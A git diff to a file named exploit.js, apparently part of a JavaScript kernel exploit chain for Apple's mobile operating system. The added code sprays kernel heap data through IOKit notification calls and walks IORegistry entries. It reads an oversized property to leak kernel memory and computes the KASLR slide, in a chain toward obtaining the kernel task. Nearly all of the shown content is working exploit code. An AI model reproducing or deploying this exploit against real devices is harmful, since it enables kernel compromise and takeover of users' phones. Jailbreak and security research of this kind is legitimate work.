Diffstat (limited to 'src/js/kexp/exploit.js')
-rw-r--r--src/js/kexp/exploit.js28
1 files changed, 27 insertions, 1 deletions
diff --git a/src/js/kexp/exploit.js b/src/js/kexp/exploit.js
index a78bdca..5296e6e 100644
--- a/src/js/kexp/exploit.js
+++ b/src/js/kexp/exploit.js
@@ -20,6 +20,8 @@ var KERN_SUCCESS = 0;
var NULL = 0;
var MACH_PORT_NULL = 0;
+var fakeportData = 0;
+
var kOSSerializeDictionary = 0x01000000;
var kOSSerializeArray = 0x02000000;
var kOSSerializeSet = 0x03000000;
@@ -73,6 +75,7 @@ function spray_data(mem, size, num, portptr) {
printf("%x %x\n", master, read_u32(master));
printf("%x\n", read_u32(0x36ebf00c + get_dyld_shc_slide()));
ret = io_service_add_notification_ool(read_u32(master), "IOServiceTerminate", dict, __cnt * 4, MACH_PORT_NULL, NULL, 0, err, portptr);
+ printf("still alive?\n");
if (ret == KERN_SUCCESS) {
ret = read_u32(err);
}
@@ -86,10 +89,11 @@ function copyinPort(kport, cnt) {
var self = mach_task_self();
var service = MACH_PORT_NULL;
var client = malloc(4);
- var it = MACH_PORT_NULL;
+ var it = malloc(4);
var o = MACH_PORT_NULL;
var data = malloc(4);
var master = malloc(4);
+ fakeportData = malloc(4);
host_get_io_master(mach_host_self(), master);
ret = spray_data(NULL, 0, 5, data);
printf("spray_data=%d (%s)\n", ret, mach_error_string(ret));
@@ -112,6 +116,28 @@ function copyinPort(kport, cnt) {
ret = read_u32(err);
}
printf("io_service_open_extended=%d (%s)\n", ret, mach_error_string(ret));
+ IORegistryEntryGetChildIterator(service, "IOService", it);
+
+ var found = false;
+
+ while ((o = IOIteratorNext(read_u32(it))) != MACH_PORT_NULL && !found) {
+ var buf = malloc(16 * 4);
+ var size = malloc(4);
+ write_u32(size, 16 * 4);
+ ret = IORegistryEntryGetProperty(o, "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA", buf, size);
+ if (ret == KERN_SUCCESS) {
+ printf("yolo\n");
+// mach_port_deallocate(self, read_u32(data));
+// write_u32(data, MACH_PORT_NULL);
+ spray_data(tst, strlen(tst) + 1, 10, fakeportData);
+ var kslide = (((read_u32(buf + (9 << 2)) & 0xFFF00000) + 0x1000) -0x80001000) >>> 0;
+ printf("still alive? %x\n", 420);
+ printf("YOLO YOLO YOLO kaslr_slide=%s\n", kslide.toString(16));
+ sleep(1);
+ found = true;
+ }
+ }
+
}
function get_kernel_task() {